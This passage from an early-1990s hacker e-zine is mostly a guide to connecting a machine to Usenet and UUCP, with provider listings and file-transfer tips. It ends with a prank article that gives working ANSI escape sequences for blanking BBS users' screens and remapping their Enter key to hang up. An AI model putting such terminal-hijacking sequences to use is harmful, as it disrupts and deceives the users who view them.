Once you have software, read and re-read the docs. Get a friend to connect
|
||
with you and learn how to use your software before you bother a sysadmin with
|
||
connecting to Usenet proper.
|
||
|
||
CONNECTING TO USENET
|
||
|
||
And now the hard part: you need to find someone to feed you. Mail feeds
|
||
are usually not too difficult, but newsfeeds are harder to come by as they
|
||
take more resources from the host machine than mail feeds due to the much
|
||
larger volume of information. Possible sources of feeds include:
|
||
|
||
- Systems on the previously mentioned *nixpub listing.
|
||
- Local colleges or universities.
|
||
- Systems found scanning the uucp maps.
|
||
|
||
These can be gotten using anonymous uucp from UUNET, or also from
|
||
the mail server at MIT. You can request an index of the maps by
|
||
sending email to 'mail-server@pit-manager.mit.edu' with this message:
|
||
|
||
path <your-site@address>
|
||
send usenet/comp.mail.maps/index
|
||
quit
|
||
|
||
You can get help for this mail server by replacing the 'send' line
|
||
with just 'help'. You can see how being on the net already helps you
|
||
to get your machine on the net. The uucp maps are also an excellent
|
||
hackers tool as they list the sites in your area, points of contact,
|
||
and how they connect up to each other (at least for uucp connections).
|
||
|
||
I believe older copies of the uucp maps can be found in the TELECOM
|
||
or UNIX forums on Compuserve.
|
||
|
||
- Pay services.
|
||
|
||
Here are some of the providers:
|
||
|
||
o Anterior Technology
|
||
P.O. Box 1206
|
||
Menlo Park, CA 94026-1206
|
||
Voice: (415) 328-5615
|
||
info@fernwood.mpk.ca.us
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o CERFnet
|
||
P.O. Box 85608
|
||
San Diego, CA 92186-9784
|
||
Voice: (800) 876-CERF
|
||
help@cerf.net
|
||
(connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o Colorado SuperNet, Inc.
|
||
Attn: David C. Menges
|
||
Colorado School of Mines
|
||
1500 Illinois
|
||
Golden, CO 80401
|
||
Voice: 303-273-3471
|
||
dcm@csn.org
|
||
(UUCP, news feeds)
|
||
|
||
o MSEN, Inc.
|
||
628 Brooks Street
|
||
Ann Arbor, MI 48103
|
||
Voice: (313) 741-1120
|
||
info@msen.com
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o MV Communications, Inc.
|
||
P.O. Box 4963
|
||
Manchester, NH 03108-4963
|
||
Voice: (603) 429-2223
|
||
Data: (603) 429-1735 (log in as "info" or "rates")
|
||
info@mv.mv.com
|
||
(UUCP, name service, MX forwarding, news feeds)
|
||
|
||
o NEARnet
|
||
Attn: John Curran
|
||
BBN Systems and Technologies
|
||
MS 6/3B
|
||
10 Moulton Street
|
||
Cambridge, MA 02138
|
||
Voice: (617) 873-8730
|
||
jcurran@nic.near.net
|
||
(connectivity, name service, MX forwarding, news feeds (for
|
||
NEARnet sites))
|
||
|
||
o Netcom - Online Communication Services
|
||
P.O. Box 20774
|
||
San Jose, CA 95160
|
||
Voice: (408) 554-8649
|
||
bobr@netcom.com
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o SURAnet
|
||
8400 Baltimore Blvd.
|
||
College Park, MD 20742
|
||
Voice: (301) 982-3214
|
||
news-admin@sura.net
|
||
(connectivity, name service (for SURAnet sites), news feeds (for
|
||
SURAnet sites))
|
||
|
||
o UUNET Canada, Inc.
|
||
1 Yonge St., Suite 1801
|
||
Toronto, Ontario
|
||
Canada M5E 1W7
|
||
Voice: (416) 368-6621
|
||
info@uunet.ca or uunet-ca@uunet.uu.net
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o UUNET Technologies Inc.
|
||
3110 Fairview Park Drive, Suite 570
|
||
Falls Church, VA 22042
|
||
Voice: (703) 876-5050
|
||
info@uunet.uu.net
|
||
AlterNet (network connectivity) info: alternet-info@uunet.uu.net
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
o UUNORTH, Inc.
|
||
Box 445, Station E
|
||
Toronto, Ontario
|
||
Canada M6H 4E3
|
||
Voice: (416) 537-4930 or (416) 225-UNIX
|
||
|
||
o Performance Systems International, Inc.
|
||
11800 Sunrise Valley Drive, Suite 1100
|
||
Reston, VA 22091
|
||
Voice: (703) 620-6651 or (800) 827-7482
|
||
Computerized info: all-info@psi.com
|
||
Human-based info: info@psi.com
|
||
(UUCP, connectivity, name service, MX forwarding, news feeds)
|
||
|
||
SUBMIT A UUCP MAP ENTRY
|
||
|
||
All machines connecting to the UUCP network should submit
|
||
a UUCP map to the map coordinator, <uucpmap@rutgers.edu>. The
|
||
purpose of these maps is to facilitate finding the fastest
|
||
path between any two systems, and also to prevent duplicate
|
||
names that would cause mail to be lost.
|
||
|
||
Maps are posted to comp.mail.maps newsgroup on a fairly
|
||
regular basis. In addition to the maps, there is a README file
|
||
that documents these details in much more detail -- the
|
||
information here is not enough to construct a full map entry.
|
||
|
||
You should obtain this README file from one of your neighbors;
|
||
it is also available on the waffle BBS system +1 408 245 SPAM (as
|
||
the file /public/waffle/uucp-map.txt), or it can be found in the
|
||
/public/text/misc directory on The Underground BBS.
|
||
|
||
The basic format of the maps consists of a number of lines
|
||
with a # and a letter, followed by a tab and then information
|
||
corresponding to that letter:
|
||
|
||
#N UUCP name of site
|
||
#S manufacturer machine model; operating system & version
|
||
#O organization name
|
||
#C contact person's name
|
||
#E contact person's electronic mail address
|
||
#T contact person's telephone number
|
||
#P organization's address
|
||
#L latitude / longitude
|
||
#R remarks
|
||
#U netnews neighbors
|
||
#W who last edited the entry ; date edited
|
||
#
|
||
sitename .domain
|
||
sitename remote1(FREQUENCY), remote2(FREQUENCY),
|
||
remote3(FREQUENCY)
|
||
|
||
ARCHIVE SERVERS
|
||
|
||
There are many archive servers. These systems provide files via e-mail.
|
||
For example the pit-manager mail server at MIT mentioned above is one. You
|
||
can get back issues of the Computer Underground Digest from the University
|
||
of Chicago archive server. To use the U. of Chicago email server, send mail
|
||
with the subject "help" (without the quotes) to:
|
||
|
||
archive-server@chsun1.spc.uchicago.edu.
|
||
|
||
There are many more archive servers. You can also get binaries using a
|
||
pair of utilities called uuencode, and uudecode. These utilities convert
|
||
binary code to ascii text code suitable for transmission via e-mail (or to be
|
||
posted on when of the many .binaries newsgroups on Usenet.
|
||
|
||
MAILING LISTS
|
||
|
||
Once you have an e-mail account you can join mailing lists. These can be
|
||
the electronic equivalent of the newsletters, or they can echo mail to
|
||
multiple destinations. For example you mail a certain mail list, and copies
|
||
will be echoed to all who are on the list. For example you can sign up for
|
||
the Phrack electronic P/H newsletter by:
|
||
|
||
1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail
|
||
must be sent from the account where you wish Phrack to be delivered.
|
||
|
||
2. Leave the "Subject:" field of that letter empty.
|
||
|
||
3. The first line of your mail message should read:
|
||
SUBSCRIBE PHRACK <your name here>
|
||
|
||
4. DO NOT leave your address in the name field!
|
||
(This field is for PHRACK STAFF use only, so please use a full name)
|
||
|
||
Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.
|
||
|
||
Incidentally, you do not have to be part of the Usenet, ot the Internet
|
||
(the TCP/IP network), to participate. See the excellent article in NIA73
|
||
about e-mail gateways between networks "Internet to Anywhere" by Industrial
|
||
Phreak.
|
||
|
||
I should also mention that with a mail account, you can still post to
|
||
a Usenet newsgroup. Send mail to <newsgroup>@ucbvax.berkeley.edu. For
|
||
newsgroup you want to change any periods to dashes. For example,
|
||
alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire
|
||
a response to your posting be sure to put in a line like: Please e-mail all
|
||
replies.
|
||
|
||
USING UUCP TO TRANSFER FILES
|
||
|
||
The uucp program allows files to be transmitted to and from
|
||
any neighboring system, via the command line.
|
||
|
||
To "push" a file from the local machine to the remote machine:
|
||
|
||
uucp filename.here unix!~/filename.there
|
||
|
||
To "pull" a file into a machine off the remote machine:
|
||
|
||
uucp unix!~/filename.there filename.here
|
||
|
||
unix is used here as the name of the remote machine.
|
||
|
||
For example you can connect to the uunet machine directly via
|
||
a 1-900 number, and get access to a wealth of source code and
|
||
information about the network. Call 1-900-468-7727 and use the login
|
||
"uucp" with no password. Callers are charged 50 cents per minute.
|
||
The charges appear on your phone bill.
|
||
|
||
The file uunet!~/help contains instructions. The file
|
||
uunet!~/ls-lR.Z contains a complete list of the files available
|
||
and is updated daily. Files ending in Z need to be uncompressed
|
||
before being used. The file uunet!~/compress.tar is a tar
|
||
archive containing the C sources for the uncompress program.
|
||
|
||
1. How to reach UUNET's 900 number via uucp
|
||
|
||
Here are some sample a L.sys or Systems file lines suitable for
|
||
UUNET's 900 number:
|
||
|
||
# Simple line.
|
||
uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
|
||
#
|
||
# Set up for a Telebit.
|
||
uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT ""
|
||
login: uucp
|
||
|
||
Modify as appropriate for your site, of course, to deal with your
|
||
local telephone system and uucp version.
|
||
|
||
All modems on the 900 lines are Telebit T2500s. Note that these
|
||
modems first answer with V.32, then at 2400, 1200, and last with PEP
|
||
tones. This "900" number charges $.50US per minute to the caller.
|
||
|
||
2. Where the files are
|
||
|
||
This file of instructions exists as the file uunet!~/info/archive-help
|
||
uunet!~/ls-lR.Z contains a list of all files available. This is the
|
||
compressed output of an `ls -lR' command. This file is updated each
|
||
night. (Note this file is currently about 520 Kbytes *compressed*).
|
||
Information on other indexes can be found in uunet!~/index/README.
|
||
The file uunet!~/info/layout details the basic organization of the
|
||
archive.
|
||
|
||
3. File formats
|
||
|
||
Files with .Z endings are compressed. The uncompress program is
|
||
available in uunet!~/compress.tar if you don't have it.
|
||
|
||
Some very large files have been split into several files for you.
|
||
This are usually evidenced by sequenced endings after a .Z ending.
|
||
eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39
|
||
After you obtain all of the parts you need only concatenate them
|
||
in the proper order.
|
||
eg: cat 18.57.Z.* > emacs-18.57.Z
|
||
|
||
UUCP File Transfer Tips
|
||
|
||
You must write files you transfer to a directory which the user
|
||
"uucp" has write access. That user, not you, will actually do the
|
||
transfer. /usr/spool/uucppublic is the common place used.
|
||
|
||
You may see different pathnames for files in an archive which
|
||
equate to the same thing. For example an archive that is /usr/spool/ftp
|
||
(aka ~ftp), might also accessible as /usr/spool/uucppublic (aka
|
||
~uucp, or just ~ for UUCP).
|
||
|
||
Be sure you use absolute pathnames when specifying remote filename.
|
||
If you don't, your working directory will be prepended to the
|
||
pathname in the command. uunet!file and uunet!~/file are different.
|
||
uunet!~/ is the best reference to the base of the archive via uucp.
|
||
|
||
Permission denied messages normally indicate a file name or
|
||
file access problem. Be sure to have the latest copy of the file
|
||
list.
|
||
|
||
Beware when using shell meta-characters in transfers. You need to
|
||
escape them in most circumstances (eg: the ! in csh). Also note
|
||
that there are a number of UUCP implementations which do not handle
|
||
multi-file transfers correctly. If you pass a * to the remote
|
||
system you may get 'access denied' messages. These indicate a UUCP
|
||
problem, not a file problem.
|
||
|
||
OTHER RESOURCES
|
||
|
||
In addition to the resources already mentioned, there are several
|
||
books which discuss USENET and/or UUCP maintenance. They include:
|
||
|
||
Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2
|
||
Date: 1990. Pages: 210. Cost: $24.95
|
||
|
||
Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
|
||
ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95
|
||
|
||
Both are "Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut
|
||
Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts
|
||
|
||
Unix Communications; Bart Anderson, Barry Costales, and Harry
|
||
Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
|
||
Pages: 736. Cost: $29.95.
|
||
|
||
Covers everything the end user needs to know about email, USENET and UUCP.
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 8 of 8 |
|
||
------------------
|
||
|
||
To: hackers@tsf.UUCP
|
||
Subject: Text phile 3.
|
||
From: bbc@tsf.UUCP (The BBC)
|
||
Organization: The CyberUnderground
|
||
|
||
Welcome, Kiddies... To another jam packed fun day at... The BBC's
|
||
crash house... Todays secret word is 'ANSI'... Yes after this lesson
|
||
when ever a sysop/user hears the word 'ANSI', They will scream real
|
||
loud!!!
|
||
|
||
First lets ask our friend Crashy a question... Crashy, do you
|
||
use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have
|
||
the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???
|
||
'Well... Yes, I guess'... Good, See kiddies every one uses it but
|
||
few understand it... An that is how we will play with the users
|
||
of a bbs's mind as well as the sysops [usually not much of one here]...
|
||
|
||
First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method
|
||
of controlling IO on remote systems... It uses escape sequences to
|
||
do every thing from moving the cursor around and changing color of
|
||
the text to redefining the keyboard keys... A very useful tool for
|
||
helping computer users and making nice displays.. An a cheep shot
|
||
as far as hacking games go... But that never stoped us before... For
|
||
what if some devious minds where to put them to use??? An we are just
|
||
the ones to do it... Also for those who don't know, [ESC] stands for
|
||
the escape char. [0x1b] or to type it in remote hold down the ALT key
|
||
while typing 27 on the numeric key pad then release the ALT key...
|
||
|
||
Lets start with a classic... We all know to change the text color
|
||
you use the sequence 'ESC[<color>;<color>;...<color>m' and it will
|
||
change the color for all following text till it is used again... Well
|
||
what if one uses the command 'ESC[0;8m'... This would cause the ANSI
|
||
[AAAAHHHHH] driver to reset the color to default then set the screen
|
||
to black text on a black background... What a glorious sight (or lack
|
||
of there) when the computer just seems to stop... No text no
|
||
nothing... An if they don't reset it, well.... All the boards they
|
||
call afterwards will do the same...
|
||
|
||
Or how about this one... 'ESC[=0h;=7l'... All it does is set the
|
||
screen to 40 column mode and turns line wrapping off... So there eyes
|
||
get a rest... only half the calories of a regular screen and in
|
||
larger portions...
|
||
|
||
Then there is the story of the farmer's 'ESC[26;0H'... Moving the
|
||
cursor off the screen and making them wait for the next prompt (if
|
||
this command is at the end of a message) that seams to never come...
|
||
But you should not tell this joke in polite company...
|
||
|
||
An of course we saved the best for last... The ol' Two Face key
|
||
change... Just use the command 'ESC[<From key>;<To key>p' and wha-la
|
||
instant chaos... For example 'ESC[13;0;35p', next time the [ENTER]
|
||
key is hit it changes into a ALT-H (The hangup command for most
|
||
term packages... An we would hope you would not use this to just
|
||
redefine the whole keyboard so that what they type is not what
|
||
they get!!! That would be.... bad... An you are not a bunch of
|
||
bad boys and girls are you... We thought so...
|
||
|
||
So boys and girls... Its time to go... and remember...
|
||
The night belongs to the hackers... The early hacker gets to DOS...
|
||
A virus in the system is worth 2 trojans in the bush... Ect.. Ect..
|
||
Ect..
|
||
|
||
'Another fine mess' from your friends at...
|
||
The BBC
|
||
|
||
----------------------------------------------------------------------
|
||
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
|
||
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
That's all folks...keep that e-mail coming!
|
||
------------------------------------------------------------------------------
|
||
|
||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||
-= Max Cray =-
|
||
Internet: underg!max@uunet.uu.net Support
|
||
UUCP: ...!uunet!idsvax!underg!max Free
|
||
Data: The Underground Computing Foundation BBS Software
|
||
401-847-2603 -=- 9600 baud (v.32) (w/src)
|
||
CI$: 76334,2203
|
||
|
||
|
||
|
||
|